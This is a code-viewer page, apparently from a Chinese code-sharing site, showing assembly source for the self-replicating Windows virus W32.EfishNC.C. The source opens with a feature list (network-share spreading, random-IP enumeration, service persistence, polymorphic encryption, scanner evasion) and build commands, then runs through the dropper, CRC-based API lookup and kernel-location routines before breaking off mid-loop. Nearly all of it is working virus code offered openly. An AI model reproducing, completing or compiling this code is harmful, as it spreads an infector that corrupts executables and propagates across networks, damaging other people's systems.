?? 29a-7.003
字號:
comment ;)
W32.EfishNC.C by roy g biv
some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- EPO and xlat (unbreakable!) encryption with polymorphic decryptor
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs on stack)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before :)
---
optimisation tip: Windows appends ".dll" automatically, so this works:
push "cfs"
push esp
call LoadLibraryA
---
to build this thing:
tasm
----
tasm32 /ml /m3 efishnc
tlink32 /B:400000 /x efishnc,,,import32
Virus is not self-modifying, so no need to alter section attributes
---
We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)
(;
.486
.model flat
extern GetCurrentProcess:proc
extern WriteProcessMemory:proc
extern MessageBoxA:proc
extern ExitProcess:proc
.data
;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper
expnames db "WriteProcessMemory" , 0
db "WriteFile" , 0
db "WinExec" , 0
db "SetFileAttributesA" , 0
db "MoveFileA" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetWindowsDirectoryA", 0
db "GetTickCount" , 0
db "GetTempFileNameA" , 0
db "GetFileAttributesA" , 0
db "GetCurrentProcess" , 0
db "DeleteFileA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
regnames db "RegSetValueA" , 0
db "OpenSCManagerA" , 0
db "CreateServiceA" , 0
db "CloseServiceHandle", 0
exenames db "LoadLibraryA" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetStartupInfoW", 0
db "GetStartupInfoA", 0
db "GetCommandLineW", 0
db "GetCommandLineA", 0
db "ExitProcess" , 0
db "CreateProcessW" , 0
db "CreateProcessA" , 0
usrnames db "CharNextW", 0
db "CharNextA", 0
svcnames db "StartServiceCtrlDispatcherA", 0
krnnames db "lstrlenW" , 0
db "lstrcpyW" , 0
db "lstrcatW" , 0
db "UnmapViewOfFile" , 0
db "Sleep" , 0
db "SetFileTime" , 0
db "SetFileAttributesW" , 0
db "SetFileAttributesA" , 0
db "SetCurrentDirectoryW", 0
db "SetCurrentDirectoryA", 0
db "MultiByteToWideChar" , 0
db "MapViewOfFile" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetFullPathNameW" , 0
db "GetFullPathNameA" , 0
db "GetDriveTypeA" , 0
db "FindNextFileW" , 0
db "FindNextFileA" , 0
db "FindFirstFileW" , 0
db "FindFirstFileA" , 0
db "FindClose" , 0
db "CreateThread" , 0
db "CreateFileW" , 0
db "CreateFileMappingA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
sfcnames db "SfcIsFileProtected", 0
netnames db "WNetOpenEnumW" , 0
db "WNetOpenEnumA" , 0
db "WNetEnumResourceW", 0
db "WNetEnumResourceA", 0
db "WNetCloseEnum" , 0
ip9xnames db "NetShareEnum", 0
ipntnames db "NetShareEnum" , 0
db "NetApiBufferFree", 0
txttitle db "EfishNC", 0
txtbody db "running...", 0
include efishnc.inc
.code
dropper label near
mov edx, expcrc_count
mov ebx, offset expnames
mov edi, offset expcrcbegin
call create_crcs
mov edx, regcrc_count
mov ebx, offset regnames
mov edi, offset regcrcbegin
call create_crcs
mov edx, execrc_count
mov ebx, offset exenames
mov edi, offset execrcbegin
call create_crcs
mov edx, usrcrc_count
mov ebx, offset usrnames
mov edi, offset usrcrcbegin
call create_crcs
mov edx, svccrc_count
mov ebx, offset svcnames
mov edi, offset svccrcbegin
call create_crcs
mov edx, krncrc_count
mov ebx, offset krnnames
mov edi, offset krncrcbegin
call create_crcs
mov edx, sfccrc_count
mov ebx, offset sfcnames
mov edi, offset sfccrcbegin
call create_crcs
mov edx, netcrc_count
mov ebx, offset netnames
mov edi, offset netcrcbegin
call create_crcs
mov edx, ip9xcrc_count
mov ebx, offset ip9xnames
mov edi, offset ip9xcrcbegin
call create_crcs
mov edx, ipntcrc_count
mov ebx, offset ipntnames
mov edi, offset ipntcrcbegin
call create_crcs
restore_loc label near
pushad
enter 0, 0
jmp efishnc_inf
db decsize - (offset $ - offset restore_loc) dup ('r')
xor ebx, ebx
push ebx
push offset txttitle
push offset txtbody
push ebx
call MessageBoxA
push ebx
call ExitProcess
create_crcs proc near
imul ebp, edx, 4
create_loop label near
or eax, -1
create_outer label near
xor al, byte ptr [ebx]
push 8
pop ecx
create_inner label near
add eax, eax
jnb create_skip
xor eax, 4c11db7h ;use generator polymonial (see IEEE 802)
create_skip label near
loop create_inner
sub cl, byte ptr [ebx] ;carry set if not zero
inc ebx ;carry not altered by inc
jb create_outer
push eax
dec edx
jne create_loop
mov eax, esp
push ecx
push ebp
push eax
push edi
call GetCurrentProcess
push eax
xchg esi, eax
call WriteProcessMemory
add esp, ebp
ret
create_crcs endp
;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------
efishnc_inf proc near
cld ;decryptor can set D flag
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
expcrcbegin label near ;place < 80h bytes from call for smaller code
dd (expcrc_count + 1) dup (0)
expcrcend label near
dd offset drop_exp - offset expcrcend + 4
db "EfishNC - roy g biv" ;better, stronger, faster
walk_seh label near
xor esi, esi
lods dword ptr fs:[esi]
inc eax
seh_loop label near
dec eax
xchg esi, eax
lods dword ptr [esi]
inc eax
jne seh_loop
lods dword ptr [esi]
;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------
init_findmz label near
inc eax
xchg edi, eax
find_mzhdr label near
;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------
dec edi ;sub 64kb
xor di, di ;64kb align
call is_pehdr
jne find_mzhdr
mov ebx, edi
pop edi
;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------
mov esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
lea esi, dword ptr [ebx + esi + peexp.expordbase]
lods dword ptr [esi] ;Ordinal Base
lea ebp, dword ptr [eax * 2 + ebx]
lods dword ptr [esi]
lods dword ptr [esi]
lods dword ptr [esi] ;Export Address Table RVA
lea edx, dword ptr [ebx + eax]
lods dword ptr [esi] ;Name Pointer Table RVA
add ebp, dword ptr [esi] ;Ordinal Table RVA
lea ecx, dword ptr [ebx + eax]
mov esi, ecx
push_export label near
push ecx
get_export label near
lods dword ptr [esi]
push ebx
add ebx, eax ;Name Pointer VA
or eax, -1
crc_outer label near
xor al, byte ptr [ebx]
push 8
pop ecx
crc_inner label near
add eax, eax
jnb crc_skip
xor eax, 4c11db7h ;use generator polymonial (see IEEE 802)
crc_skip label near
loop crc_inner
sub cl, byte ptr [ebx] ;carry set if not zero
inc ebx ;carry not altered by inc
jb crc_outer
pop ebx
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -